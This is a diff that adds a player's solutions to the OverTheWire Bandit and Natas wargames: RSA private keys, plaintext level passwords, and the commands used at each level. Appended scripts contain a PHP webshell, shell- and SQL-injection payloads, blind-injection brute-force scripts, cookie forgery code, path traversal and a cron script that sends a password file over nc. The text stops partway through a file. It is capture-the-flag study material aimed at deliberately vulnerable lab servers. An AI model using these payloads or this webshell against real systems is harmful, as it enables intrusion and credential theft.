OverTheWire

overthewire/bandit/keys/id_bandit14

@@ -0,0 +1,27 @@
+-----BEGIN RSA PRIVATE KEY-----
+MIIEpAIBAAKCAQEAxkkOE83W2cOT7IWhFc9aPaaQmQDdgzuXCv+ppZHa++buSkN+
+gg0tcr7Fw8NLGa5+Uzec2rEg0WmeevB13AIoYp0MZyETq46t+jk9puNwZwIt9XgB
+ZufGtZEwWbFWw/vVLNwOXBe4UWStGRWzgPpEeSv5Tb1VjLZIBdGphTIK22Amz6Zb
+ThMsiMnyJafEwJ/T8PQO3myS91vUHEuoOMAzoUID4kN0MEZ3+XahyK0HJVq68KsV
+ObefXG1vvA3GAJ29kxJaqvRfgYnqZryWN7w3CHjNU4c/2Jkp+n8L0SnxaNA+WYA7
+jiPyTF0is8uzMlYQ4l1Lzh/8/MpvhCQF8r22dwIDAQABAoIBAQC6dWBjhyEOzjeA
+J3j/RWmap9M5zfJ/wb2bfidNpwbB8rsJ4sZIDZQ7XuIh4LfygoAQSS+bBw3RXvzE
+pvJt3SmU8hIDuLsCjL1VnBY5pY7Bju8g8aR/3FyjyNAqx/TLfzlLYfOu7i9Jet67
+xAh0tONG/u8FB5I3LAI2Vp6OviwvdWeC4nOxCthldpuPKNLA8rmMMVRTKQ+7T2VS
+nXmwYckKUcUgzoVSpiNZaS0zUDypdpy2+tRH3MQa5kqN1YKjvF8RC47woOYCktsD
+o3FFpGNFec9Taa3Msy+DfQQhHKZFKIL3bJDONtmrVvtYK40/yeU4aZ/HA2DQzwhe
+ol1AfiEhAoGBAOnVjosBkm7sblK+n4IEwPxs8sOmhPnTDUy5WGrpSCrXOmsVIBUf
+laL3ZGLx3xCIwtCnEucB9DvN2HZkupc/h6hTKUYLqXuyLD8njTrbRhLgbC9QrKrS
+M1F2fSTxVqPtZDlDMwjNR04xHA/fKh8bXXyTMqOHNJTHHNhbh3McdURjAoGBANkU
+1hqfnw7+aXncJ9bjysr1ZWbqOE5Nd8AFgfwaKuGTTVX2NsUQnCMWdOp+wFak40JH
+PKWkJNdBG+ex0H9JNQsTK3X5PBMAS8AfX0GrKeuwKWA6erytVTqjOfLYcdp5+z9s
+8DtVCxDuVsM+i4X8UqIGOlvGbtKEVokHPFXP1q/dAoGAcHg5YX7WEehCgCYTzpO+
+xysX8ScM2qS6xuZ3MqUWAxUWkh7NGZvhe0sGy9iOdANzwKw7mUUFViaCMR/t54W1
+GC83sOs3D7n5Mj8x3NdO8xFit7dT9a245TvaoYQ7KgmqpSg/ScKCw4c3eiLava+J
+3btnJeSIU+8ZXq9XjPRpKwUCgYA7z6LiOQKxNeXH3qHXcnHok855maUj5fJNpPbY
+iDkyZ8ySF8GlcFsky8Yw6fWCqfG3zDrohJ5l9JmEsBh7SadkwsZhvecQcS9t4vby
+9/8X4jS0P8ibfcKS4nBP+dT81kkkg5Z5MohXBORA7VWx+ACohcDEkprsQ+w32xeD
+qT1EvQKBgQDKm8ws2ByvSUVs9GjTilCajFqLJ0eVYzRPaY6f++Gv/UVfAPV4c+S0
+kAWpXbv5tbkkzbS0eaLPTKgLzavXtQoTtKwrjpolHKIHUz6Wu+n4abfAIRFubOdN
+/+aLoRQ0yBDRbdXMsZN/jvY44eM+xRLdRVyMmdPtP8belRi2E2aEzA==
+-----END RSA PRIVATE KEY-----

overthewire/bandit/keys/id_bandit14.pub

@@ -0,0 +1 @@
+ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDGSQ4TzdbZw5PshaEVz1o9ppCZAN2DO5cK/6mlkdr75u5KQ36CDS1yvsXDw0sZrn5TN5zasSDRaZ568HXcAihinQxnIROrjq36OT2m43BnAi31eAFm58a1kTBZsVbD+9Us3A5cF7hRZK0ZFbOA+kR5K/lNvVWMtkgF0amFMgrbYCbPpltOEyyIyfIlp8TAn9Pw9A7ebJL3W9QcS6g4wDOhQgPiQ3QwRnf5dqHIrQclWrrwqxU5t59cbW+8DcYAnb2TElqq9F+BiepmvJY3vDcIeM1Thz/YmSn6fwvRKfFo0D5ZgDuOI/JMXSKzy7MyVhDiXUvOH/z8ym+EJAXyvbZ3

overthewire/bandit/keys/id_bandit17

@@ -0,0 +1,27 @@
+-----BEGIN RSA PRIVATE KEY-----
+MIIEogIBAAKCAQEAvmOkuifmMg6HL2YPIOjon6iWfbp7c3jx34YkYWqUH57SUdyJ
+imZzeyGC0gtZPGujUSxiJSWI/oTqexh+cAMTSMlOJf7+BrJObArnxd9Y7YT2bRPQ
+Ja6Lzb558YW3FZl87ORiO+rW4LCDCNd2lUvLE/GL2GWyuKN0K5iCd5TbtJzEkQTu
+DSt2mcNn4rhAL+JFr56o4T6z8WWAW18BR6yGrMq7Q/kALHYW3OekePQAzL0VUYbW
+JGTi65CxbCnzc/w4+mqQyvmzpWtMAzJTzAzQxNbkR2MBGySxDLrjg0LWN6sK7wNX
+x0YVztz/zbIkPjfkU1jHS+9EbVNj+D1XFOJuaQIDAQABAoIBABagpxpM1aoLWfvD
+KHcj10nqcoBc4oE11aFYQwik7xfW+24pRNuDE6SFthOar69jp5RlLwD1NhPx3iBl
+J9nOM8OJ0VToum43UOS8YxF8WwhXriYGnc1sskbwpXOUDc9uX4+UESzH22P29ovd
+d8WErY0gPxun8pbJLmxkAtWNhpMvfe0050vk9TL5wqbu9AlbssgTcCXkMQnPw9nC
+YNN6DDP2lbcBrvgT9YCNL6C+ZKufD52yOQ9qOkwFTEQpjtF4uNtJom+asvlpmS8A
+vLY9r60wYSvmZhNqBUrj7lyCtXMIu1kkd4w7F77k+DjHoAXyxcUp1DGL51sOmama
++TOWWgECgYEA8JtPxP0GRJ+IQkX262jM3dEIkza8ky5moIwUqYdsx0NxHgRRhORT
+8c8hAuRBb2G82so8vUHk/fur85OEfc9TncnCY2crpoqsghifKLxrLgtT+qDpfZnx
+SatLdt8GfQ85yA7hnWWJ2MxF3NaeSDm75Lsm+tBbAiyc9P2jGRNtMSkCgYEAypHd
+HCctNi/FwjulhttFx/rHYKhLidZDFYeiE/v45bN4yFm8x7R/b0iE7KaszX+Exdvt
+SghaTdcG0Knyw1bpJVyusavPzpaJMjdJ6tcFhVAbAjm7enCIvGCSx+X3l5SiWg0A
+R57hJglezIiVjv3aGwHwvlZvtszK6zV6oXFAu0ECgYAbjo46T4hyP5tJi93V5HDi
+Ttiek7xRVxUl+iU7rWkGAXFpMLFteQEsRr7PJ/lemmEY5eTDAFMLy9FL2m9oQWCg
+R8VdwSk8r9FGLS+9aKcV5PI/WEKlwgXinB3OhYimtiG2Cg5JCqIZFHxD6MjEGOiu
+L8ktHMPvodBwNsSBULpG0QKBgBAplTfC1HOnWiMGOU3KPwYWt0O6CdTkmJOmL8Ni
+blh9elyZ9FsGxsgtRBXRsqXuz7wtsQAgLHxbdLq/ZJQ7YfzOKU4ZxEnabvXnvWkU
+YOdjHdSOoKvDQNWu6ucyLRAWFuISeXw9a/9p7ftpxm0TSgyvmfLF2MIAEwyzRqaM
+77pBAoGAMmjmIJdjp+Ez8duyn3ieo36yrttF5NSsJLAbxFpdlc1gvtGCWW+9Cq0b
+dxviW8+TFVEBl1O4f7HVm6EpTscdDxU+bCXWkfjuRb7Dy9GOtt9JPsX8MBTakzh3
+vBgsyi/sN3RqRBcGU40fOoZyfAMT8s1m/uYv52O6IgeuZ/ujbjY=
+-----END RSA PRIVATE KEY-----

overthewire/bandit/keys/id_bandit26

@@ -0,0 +1,27 @@
+-----BEGIN RSA PRIVATE KEY-----
+MIIEpQIBAAKCAQEApis2AuoooEqeYWamtwX2k5z9uU1Afl2F8VyXQqbv/LTrIwdW
+pTfaeRHXzr0Y0a5Oe3GB/+W2+PReif+bPZlzTY1XFwpk+DiHk1kmL0moEW8HJuT9
+/5XbnpjSzn0eEAfFax2OcopjrzVqdBJQerkj0puv3UXY07AskgkyD5XepwGAlJOG
+xZsMq1oZqQ0W29aBtfykuGie2bxroRjuAPrYM4o3MMmtlNE5fC4G9Ihq0eq73MDi
+1ze6d2jIGce873qxn308BA2qhRPJNEbnPev5gI+5tU+UxebW8KLbk0EhoXB953Ix
+3lgOIrT9Y6skRjsMSFmC6WN/O7ovu8QzGqxdywIDAQABAoIBAAaXoETtVT9GtpHW
+qLaKHgYtLEO1tOFOhInWyolyZgL4inuRRva3CIvVEWK6TcnDyIlNL4MfcerehwGi
+il4fQFvLR7E6UFcopvhJiSJHIcvPQ9FfNFR3dYcNOQ/IFvE73bEqMwSISPwiel6w
+e1DjF3C7jHaS1s9PJfWFN982aublL/yLbJP+ou3ifdljS7QzjWZA8NRiMwmBGPIh
+Yq8weR3jIVQl3ndEYxO7Cr/wXXebZwlP6CPZb67rBy0jg+366mxQbDZIwZYEaUME
+zY5izFclr/kKj4s7NTRkC76Yx+rTNP5+BX+JT+rgz5aoQq8ghMw43NYwxjXym/MX
+c8X8g0ECgYEA1crBUAR1gSkM+5mGjjoFLJKrFP+IhUHFh25qGI4Dcxxh1f3M53le
+wF1rkp5SJnHRFm9IW3gM1JoF0PQxI5aXHRGHphwPeKnsQ/xQBRWCeYpqTme9amJV
+tD3aDHkpIhYxkNxqol5gDCAt6tdFSxqPaNfdfsfaAOXiKGrQESUjIBcCgYEAxvmI
+2ROJsBXaiM4Iyg9hUpjZIn8TW2UlH76pojFG6/KBd1NcnW3fu0ZUU790wAu7QbbU
+i7pieeqCqSYcZsmkhnOvbdx54A6NNCR2btc+si6pDOe1jdsGdXISDRHFb9QxjZCj
+6xzWMNvb5n1yUb9w9nfN1PZzATfUsOV+Fy8CbG0CgYEAifkTLwfhqZyLk2huTSWm
+pzB0ltWfDpj22MNqVzR3h3d+sHLeJVjPzIe9396rF8KGdNsWsGlWpnJMZKDjgZsz
+JQBmMc6UMYRARVP1dIKANN4eY0FSHfEebHcqXLho0mXOUTXe37DWfZza5V9Oify3
+JquBd8uUptW1Ue41H4t/ErsCgYEArc5FYtF1QXIlfcDz3oUGz16itUZpgzlb71nd
+1cbTm8EupCwWR5I1j+IEQU+JTUQyI1nwWcnKwZI+5kBbKNJUu/mLsRyY/UXYxEZh
+ibrNklm94373kV1US/0DlZUDcQba7jz9Yp/C3dT/RlwoIw5mP3UxQCizFspNKOSe
+euPeaxUCgYEAntklXwBbokgdDup/u/3ms5Lb/bm22zDOCg2HrlWQCqKEkWkAO6R5
+/Wwyqhp/wTl8VXjxWo+W+DmewGdPHGQQ5fFdqgpuQpGUq24YZS8m66v5ANBwd76t
+IZdtF5HXs2S5CADTwniUS5mX1HO9l5gUkk+h0cH5JnPtsMCnAUM+BRY=
+-----END RSA PRIVATE KEY-----

overthewire/bandit/keys/id_bandit26.pub

@@ -0,0 +1 @@
+ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCmKzYC6iigSp5hZqa3BfaTnP25TUB+XYXxXJdCpu/8tOsjB1alN9p5EdfOvRjRrk57cYH/5bb49F6J/5s9mXNNjVcXCmT4OIeTWSYvSagRbwcm5P3/lduemNLOfR4QB8VrHY5yimOvNWp0ElB6uSPSm6/dRdjTsCySCTIPld6nAYCUk4bFmwyrWhmpDRbb1oG1/KS4aJ7ZvGuhGO4A+tgzijcwya2U0Tl8Lgb0iGrR6rvcwOLXN7p3aMgZx7zverGffTwEDaqFE8k0Ruc96/mAj7m1T5TF5tbwotuTQSGhcH3ncjHeWA4itP1jqyRGOwxIWYLpY387ui+7xDMarF3L

overthewire/bandit/passwords.md

@@ -0,0 +1,159 @@
+bandit0: bandit0
+bandit1: ZjLjTmM6FvvyRnrb2rfNWOZOTa6ip5If
+	`cat readme`
+bandit2: 263JGJPfgU6LtdEvgfWU1XP5yac29mFx
+	`cat ./-`
+bandit3: MNk8KNH3Usiio41PRUEoDFPqfxLPlSmx
+bandit4: 2WmrDFRmJIq3IPxneAaMGhap0pFhF3NJ
+bandit5: 4oQYVPkxZOOEOO5pTW81FB8j8lxXGUQw
+bandit6: HWasnPhtq9AVKe0dmk45nxy20cvUa6EG
+	`find inhere/ -type f -print 2>/dev/null | xargs -d '\n' ls -l | grep 1033`
+bandit7: morbNTDkSW6jIlUc0ymOdMaLnOlFVAaj
+	`cat $(find / -type f -user bandit7 -group bandit6 2>/dev/null)`
+bandit8: dfwvzFQi4mU0wfNbFOe9RoWskMLg7eEc
+	`<data.txt grep millionth`
+bandit9: 4CKMh1JI91bUIZZPXDqGanal4xvAg0JM
+	`sort data.txt | uniq -u`
+bandit10: FGUW5ilLVJrxX9kMYMmlN4MgbpfMiqey
+	`strings data.txt | grep "^=="`
+bandit11: dtR173fZKb0RRsDFSGsg2RWnpNVj3qRr
+	`cat data.txt | base64 -d`
+bandit12: 7x16WNeHIi5YkIhWsfFIqoognUTyj9Q4
+	`<data.txt tr 'A-Za-z' 'N-ZA-Mn-za-m'`
+bandit13: FO5dwFsc0cbaIiH0h8J2eUks2vdTDwAn
+	```bash
+	#!/usr/bin/env bash
+	set -e
+	WORKING=$(mktemp -d)
+	xxd -r ~/data.txt $WORKING/data.bin
+	# then run `tar xf`, `gzip -d`, `bzip2 -d` a million times
+	```
+bandit14: MU4VWeTyJk8ROof1qqmcBPaLh7lDCPvS
+	```bash
+	#!/usr/bin/env bash
+	KEY="./id_bandit14"
+	scp -P 2220 bandit13@bandit.labs.overthewire.org:~/sshkey.private $KEY
+	ssh-keygen -y -f $KEY > "$KEY.pub"
+	chmod 600 $KEY*
+	# login with private key
+	ssh bandit14@bandit.labs.overthewire.org -p 2220 -i ./id_bandit14
+	# >>> echo /etc/bandit_pass/bandit14
+	```
+bandit15: 8xCjnmgoKbGLhHFAZlGE5Tmu4M2tKJQo
+	`echo "MU4VWeTyJk8ROof1qqmcBPaLh7lDCPvS" | nc localhost 30000`
+bandit16: kSkvUpMQ7lBYyCM4GBPvCvT1BfWRy0Dx
+	`openssl s_client -connect localhost:30001`
+bandit17: STORED IN `keys/id_bandit17*`
+	```bash
+	# get all open ports
+	nmap localhost -T5 -p31000-32000 
+		| grep open 
+		| awk '{print substr($1, 1, 5)}'
+	```
+bandit18: x2gLTTjFwMOhQ8oWNbMN362QKxfRqGlO
+	`diff passwords.old passwords.new`
+bandit19: cGWpMaKXVwDUNgPAVJbWYuGHVn9zl3j8
+	`ssh bandit19@bandit.labs.overthewire.org -p 2220 -t /bin/sh`
+bandit20: 0qXahG8ZjOVMN9Ghs7iOWsCfZyXOUbYO
+	`./bandit20-do cat /etc/bandit_pass/bandit20`
+bandit21: EeoULMCra2q0dSkYj561DX7s1CpBuOBt
+	```
+	tmux new -s imbaud
+	# Ctrl-b + "
+	BOX=$(mktemp) && echo "0qXahG8ZjOVMN9Ghs7iOWsCfZyXOUbYO" > $BOX && <$BOX nc -l -p 5555
+	# Ctrl-b + o
+	~/suconnect 5555
+	```
+bandit22: tRae0UfB9v0UzbCdn9cY0gQnds9GF58Q
+	`/etc/cron.d/cronjob_bandit22` references binary `/usr/bin/cronjob_bandit22.sh`
+	which complains about bad privileges for `/tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv`
+	then cat out the temp file and BOOM
+bandit23: 0Zf11ioIjMVN551jX3CmStKLYqjk54Ga
+	Similar solution to previous one with `/etc/cron.d/cronjob_bandit23`
+	`cat /tmp/$(echo I am user bandit23 | md5sum | cut -d ' ' -f 1)`
+bandit24: gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8
+	```bash
+	# terminal 1:
+	nc -l -p 5555
+	# terminal 2:
+	echo -e "#\!/bin/bash\ncat /etc/bandit_pass/bandit24 
+		| nc localhost 5555" > /var/spool/bandit24/foo/gibme
+	```
+bandit25: iCi86ttT4KSNe1armKiwbQNmB3YJP3q4
+	'''bash
+	python3 -c "from itertools import product; [print(''.join(D)) for D in product((str(x) for x in range(10)), repeat=4)]" 
+		| xargs -L1 echo "gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8" 
+		| nc localhost 30002 
+		| grep -v "Wrong"
+	'''
+bandit26: s0773xxkk0MXfdqOfPRVr9L3jJBUOgCZ
+	First copy the private key from bandit25's home
+	Then `cat /etc/passwd | grep bandit26` to find what shell bandit26 uses:
+	# bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext
+	`cat /usr/bin/showtext` to see it runs the `more` pager then exits.
+	`more` will enter "command" mode if the terminal window is too small
+	to view the paged contents, which allows us to run the `v` command
+	which opens the content in vim instead. Next, do `:set shell=/bin/bash`
+	and then run vim's `:shell` to GTFO
+		
+bandit27: upsNCc7vzaRDx6oZC6GiR6ERwe1MowGB
+	From bandit26 in bash: `./bandit27-do cat /etc/bandit_pass/bandit27`
+bandit28: Yz9IpL0sBcCeuG7m9uQFt8ZNpS4HZRcN
+	```bash
+	BOX=$(mktemp -d); echo $BOX
+	git clone ssh://bandit27-git@localhost:2220/home/bandit27-git/repo $BOX
+	# use same password as bandit27 login
+	cd $BOX
+	# then check README
+	```
+bandit29: 4pT1t5DENaYuqnqvadYs1oE4QLCdjmJ7
+	Do same as bandit28 for `/home/bandit28-git/repo`, then:
+	`git show fb0df1358b1ff146f581651a84bae622353a71c0:README.md`
+bandit30: qp30ex3VLz5MDG1n91YowTv4Q8l7CDZL
+	Do what bandit29 did but then:
+	```bash
+	git branch -r # list all remote branches
+	git fetch --all
+	```
+bandit31: fb5S2xb7bRyFmAvQYQGEqsbhVyJqhnDy
+	Similar to bandit30 but use:
+	```bash
+	git tag
+	git show secret # show the "secret" tag	
+	```
+bandit32: 3O9RfhqyAlVBEZpVb6LYStshZoqoSx5K
+	Simply `rm .gitignore` then `git add .; git commit -m "AHHHHH"; git push -u origin`
+bandit33: tQdtbs5D5i2vJwkO8mEyYEyTL8izoeJ0
+	```bash
+	# use symbols since uppercase messes everything up
+	$0 # the shell runs  "sh <CMD>" so "sh $0" => "sh sh"
+	cat /etc/bandit_pass/bandit33
+	```
+
+```
+>>> bandit33@bandit:~/README.md <<<
+Congratulations on solving the last level of this game!
+
+At this moment, there are no more levels to play in this game. However, we are constantly working
+on new levels and will most likely expand this game with more levels soon.
+Keep an eye out for an announcement on our usual communication channels!
+In the meantime, you could play some of our other wargames.
+
+If you have an idea for an awesome new level, please let us know!
+``` 
+
+Learnings:
+```
+Connect over SSL/TLS (like telnet/nc does) using openssl:
+	`openssl s_client -connect HOST:PORT -quiet`
+	Note: commands starting with "k" will trigger "KEYUPDATE"
+		  run openssl with the `-quiet` flag to avoid this	
+	https://docs.openssl.org/3.0/man1/openssl-s_client/#connected-commands
+	
+The pager "more" goes into a command mode if the terminal is too small to display
+the content. Which allows us to run any command we want.
+
+Git:
+	git show <COMMIT>:file/path/here # print a file content at specific hash
+	git branch -r # list all branches stored on the remote
+```

overthewire/natas/passwords.md

@@ -0,0 +1,282 @@
+natas0: natas0
+natas1: 0nzCigAq7t2iALyvU9xcHlYN4MlkIwlq
+	View source
+natas2: TguMNxKo1DSa1tujBLuZJnDUlCcUAPlI
+	View source + enable absolute mode (browser extension)
+natas3: 3gqisGdR0pjm6tpkDKdIWO2hSvchLeYH
+	There's a tracking pixel `<img src="files/pixel.png">` so checking
+	out the `files/` directory we find `files/users.txt`
+
+natas4: QryZXc2e0zahULdHrtHxzyYkj59kUxLQ
+	Check `robots.txt`
+natas5: 0n35PkggAPm2zbEpOU802c0x0Msn1ToK
+	Forge the HTTP "Referer" header
+	```bash
+	http -F \                                                 # follow redirects
+		 -a natas4:QryZXc2e0zahULdHrtHxzyYkj59kUxLQ \         # auth
+		 http://natas4.natas.labs.overthewire.org/index.php \ # host
+		 "Referer: http://natas5.natas.labs.overthewire.org/" # forgery
+	```
+natas6: 0RoJwHdSKWFTYR5WuiAewauSuNaBXned
+	Forge your cookie to be "loggedIn: 1"
+natas7: bmg8SvU1LizuWjx3y7xkNERkHxGre0GS
+	The source references "includes/secret.inc", navigate here
+	then put the secret into the search widget.
+natas8: xcoXLmzMkoIP9D7hlgPlh9XD7OgLAe5Q
+	Exploit how `index.php` selects the page to load
+	http://natas7.natas.labs.overthewire.org/index.php?page=../../../../etc/natas_webpass/natas8
+natas9: ZE1ck82lmdGIoErlhQgWND6j2Wzz6b6t
+	Find the encoded secret in the source code, decode in python via:
+	`base64.b64decode(bytes.fromhex(encoded)[::-1]).decode()`
+natas10: t7I5VHvpa14sJTUGV0cbEsbYfFP2dmOu
+	Bash injection with the following input
+	`a b &>/dev/null | cat /etc/natas_webpass/natas10 #`
+natas11: UJdqkK1pTu6VLt9UHWAgRZz6sVUZ3lEk
+	Another bash injection
+	`. /etc/natas_webpass/natas11 #`
+natas12: yZdkjAYZRd3R7tq7T5kXMjMJlOIkzDeB
+	Exploit that the cookie is in a known format, simply xor
+	with a known plaintext and see what key repeats. Then use
+	that key to forge a new cookie with `"showpassword":"yes"`.
+	NOTE: see [[#Natas11 Solution Script|Appendix/"Natas11 Solution Script"]]
+natas13: trbs5pCjCrkuSknBBKHhaBxq6Wm1j3LC
+	Exploit the fact that the upload path is stored in a hidden field of the form,
+	use Inspect Element to modify this upload path to be `.php` not `.jpg`. Upload
+	a php webshell (payload and methodology can vary though). Then navigate there.
+	Via the webshell `cat /etc/natas_webpass/natas13`
+	NOTE: see [[#Natas12 Solution Script|Appendix/"Natas12 Solution Script"]]
+natas14: z3UYcr4v4uBpeX8f7EZbMHlzK4UR2XtQ
+	Exploit MIME type detection and size limit by generating a tiny 1x1 jpg
+	and adding a php script to the end. I used the same webshell as I did for natas13.
+	Then use `cat image.jpg webshell.php > payload.php`. This will be detected
+	as a jpg and will be viewable as a jpg, modify the hidden form field again
+	(same as for natas13) and change file path to `.php`.
+	NOTE: image generation via `magick -size 1x1 pattern:checkerboard image.jpg`
+natas15: SdqIqBsFcz3yotlNYErZSZwblkm0lrvx
+	Exploit SQL injection for the query: 
+```sql
+SELECT * from users where username="{username}" and password="{password}"
+```
+	Injection Parameters: username:`" or 1=1--`, password:`" --`
+natas16: hPkjKYviLQctEW33QmuXL6eDVfMW4sGo
+	Use the website as an oracle under an SQL injection.
+	NOTE: see [[#Natas15 Solution Script|Appendix/"Natas15 Solution Script"]]
+natas17: EqjHJbo7LFNb8vwhHb9s75hokh5TF0OC
+	Another oracle attack using an SQL injection. Specifically guess the
+	password character by character using `grep` to return NOTHING on failure
+	and the entire password on match `  echo "\$(grep ^<GUESS>.* /etc/natas_webpass/natas17)"`
+	which will either dump the entire dictionary or nothing (respectively).
+	NOTE: see [[#Natas16 Solution Script|Appendix/"Natas16 Solution Script"]]
+natas18: 6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ
+	Another oracle attack using an SQL injection AND this time
+	using a timing based attack.
+	NOTE: see [[#Natas17 Solution Script|Appendix/"Natas17 Solution Script"]]
+	
+natas19:
+natas20:
+
+
+
+
+### Learnings
+SQL Comments for injections
+	An appended space character is sometimes required ie `-- ` not `--`.
+
+### Appendix:
+###### Natas11 Solution Script
+```python
+import base64 as b64
+
+PLAINTEXT = '''{"showpassword":"no","bgcolor":"#ffffff"}'''
+COOKIE = 'HmYkBwozJw4WNyAAFyB1VUcqOE1JZjUIBis7ABdmbU1GIjEJAyIxTRg='
+FORGED_PLAINTEXT = '''{"showpassword":"yes","bgcolor":"#ffffff"}'''
+
+
+
+def xorbytes(x: bytes, y: bytes) -> bytes:
+    Lx, Ly = len(x), len(y)
+    if Lx < Ly: return xorbytes(y, x)
+    
+    return bytes(x[i]^y[i%Ly] for i in range(Lx))
+        
+def extract_key(k: bytes) -> tuple[bytes, int] | None:
+    Lk = len(k)
+    substr = b''
+    length = 0
+    for i in range(Lk):
+        substr += k[i:i+1]
+        length += 1 
+        if k == substr*(Lk//length) + substr[:Lk%length]:
+            return substr, length
+    return None
+
+
+def main() -> None:
+    plaintext = PLAINTEXT.encode()
+    cookie    = b64.b64decode(COOKIE)
+    decoded   = xorbytes(cookie, plaintext)
+    print('Modulated Key:', ''.join(chr(x) for x in decoded))
+    key, key_size = extract_key(decoded)
+
+    forged_cookie = b64.b64encode(xorbytes(FORGED_PLAINTEXT.encode(), key))
+    print('Forged:', forged_cookie)
+    
+
+if __name__ == '__main__':
+    try:
+        main()
+    except (KeyboardInterrupt, EOFError):
+        print('\n[!] Interrupt')
+```
+
+###### Natas12 Solution Script
+```php
+<html>
+<body>
+<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
+<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
+<input type="SUBMIT" value="Execute">
+</form>
+<pre>
+<?php
+    if(isset($_GET['cmd']))
+    {
+        system($_GET['cmd'] . ' 2>&1');
+    }
+?>
+</pre>
+</body>
+</html>
+```
+
+
+###### Natas15 Solution Script
+```bash
+#!/usr/bin/env bash
+
+req() {
+  curl http://natas15.natas.labs.overthewire.org/index.php \
+       -X POST \
+       -u natas15:SdqIqBsFcz3yotlNYErZSZwblkm0lrvx \
+       -d "username=natas16\" and $1 -- " \
+       -sS \
+    | grep exists &>/dev/null
+}
+
+# ie `guess_length "=32"` or `guess_length ">32"`
+guess_length() {
+  req "length(password)$1"
+}
+
+get_length() {
+  echo "[*] Guessing length"
+  local MIN=${1:-1}
+  local MAX=${2:-100}
+  # local PADMAX=${#MAX}
+  local FGUESS="%${#MAX}s - %-${#MAX}s"
+  while true; do
+    printf "[-] Guess: $FGUESS\r" $MIN $MAX
+    if [ $((MAX-MIN)) -eq 1 ]; then
+      break
+    fi;
+    
+    local MID=$(( (MAX+MIN)/2 ))
+    guess_length ">$MID" && MIN=$MID || MAX=$MID
+  done
+  printf "[+] Found: $FGUESS\n" $MIN $MAX
+  return $MAX
+}
+
+LOWER="abcdefghijklmnopqrstuvwxyz"
+UPPER="ABCDEFGHIJKLMNOPQRSTUVWXYZ"
+DIGIT="0123456789"
+
+guess_regex() {
+  req "regexp_like(password, '^$1[a-zA-Z0-9]*\$', 'c')"
+}
+
+exploit_oracle() {
+  echo "[@] Forcing oracle exploit"
+  local PREFIX=""
+  local LENGTH=$1
+
+  while true; do
+    if [ "${#PREFIX}" = "$LENGTH" ]; then
+      break
+    fi
+    
+    for chars in $LOWER $UPPER $DIGIT; do
+      local MIN=1
+      local MAX=${#chars}
+    
+      local RANGE="[${chars:MIN-1:1}-${chars:MAX-1:1}]"
+      echo -en "[*] ?? $RANGE\r"
+      guess_regex "$PREFIX$RANGE$POSTFIX" || continue
+      echo "[+] Found[CHARSET]: $chars"
+
+      local MID=$(( (MAX+MIN)/2 ))
+      while true; do
+        echo -en "[*] Guess: $RANGE\r"
+        if [ $((MAX-MIN)) -eq 1 ]; then
+          if guess_regex "$PREFIX${chars:MIN-1:1}"; then
+            PREFIX="${PREFIX}${chars:MIN-1:1}"
+          else
+            PREFIX="${PREFIX}${chars:MAX-1:1}"
+          fi
+          echo -e "[+] Update: ${chars:MAX-1:1} -> $PREFIX"
+          break
+        fi;
+    
+        MID=$(( (MAX+MIN)/2 ))
+        RANGE="[${chars:MIN-1:1}-${chars:MID-1:1}]"
+        guess_regex "$PREFIX$RANGE" && MAX=$MID || MIN=$MID
+      done
+      break
+    done
+  done
+  printf "[+] Found: $FGUESS\n" $MIN $MAX
+}
+
+get_length
+LENGTH=$?
+exploit_oracle "$LENGTH"
+```
+
+###### Natas16 Solution Script
+```sh
+#!/usr/bin/env bash
+
+fcmd() {
+  # echo '$(grep ^$1[a-zA-Z0-9]*$ /etc/natas_webpass/natas17)'
+  echo "\$(grep ^$1.* /etc/natas_webpass/natas17)"
+}
+
+req() {
+  curl http://natas16.natas.labs.overthewire.org/index.php \
+       -X POST \
+       -u natas16:hPkjKYviLQctEW33QmuXL6eDVfMW4sGo \
+       -d "needle=$1" \
+       -sS \
+    | grep --after-context 2 "<pre>" \
+    | tail -n1 \
+    | grep "African" &>/dev/null
+}
+
+CHARSET="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
+KNOWN=""
+GUESS=""
+for ((i=0 ; i < 32 ; i++)); do
+  for ((j=0; j<${#CHARSET}; j++)); do
+    c=${CHARSET:j:1}
+    GUESS="$KNOWN$c"
+    echo -en "[*] Guess: $GUESS                                  \r"
+    # echo $(fcmd $guess)
+    req "$(fcmd $GUESS)" || break # && KNOWN=$guess # && break
+  done
+  KNOWN=$GUESS
+  echo -en "[+] Known: $KNOWN\n                                    "
+done
+echo
+```
+
+

overthewire/natas/scripts/natas11.py

@@ -0,0 +1,42 @@
+import base64 as b64
+
+PLAINTEXT = '''{"showpassword":"no","bgcolor":"#ffffff"}'''
+COOKIE = 'HmYkBwozJw4WNyAAFyB1VUcqOE1JZjUIBis7ABdmbU1GIjEJAyIxTRg='
+FORGED_PLAINTEXT = '''{"showpassword":"yes","bgcolor":"#ffffff"}'''
+
+
+
+def xorbytes(x: bytes, y: bytes) -> bytes:
+    Lx, Ly = len(x), len(y)
+    if Lx < Ly: return xorbytes(y, x)
+    
+    return bytes(x[i]^y[i%Ly] for i in range(Lx))
+        
+def extract_key(k: bytes) -> tuple[bytes, int] | None:
+    Lk = len(k)
+    substr = b''
+    length = 0
+    for i in range(Lk):
+        substr += k[i:i+1]
+        length += 1 
+        if k == substr*(Lk//length) + substr[:Lk%length]:
+            return substr, length
+    return None
+
+
+def main() -> None:
+    plaintext = PLAINTEXT.encode()
+    cookie    = b64.b64decode(COOKIE)
+    decoded   = xorbytes(cookie, plaintext)
+    print('Modulated Key:', ''.join(chr(x) for x in decoded))
+    key, key_size = extract_key(decoded)
+
+    forged_cookie = b64.b64encode(xorbytes(FORGED_PLAINTEXT.encode(), key))
+    print('Forged:', forged_cookie)
+    
+
+if __name__ == '__main__':
+    try:
+        main()
+    except (KeyboardInterrupt, EOFError):
+        print('\n[!] Interrupt')

overthewire/natas/scripts/natas12.php

@@ -0,0 +1,16 @@
+<html>
+<body>
+<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
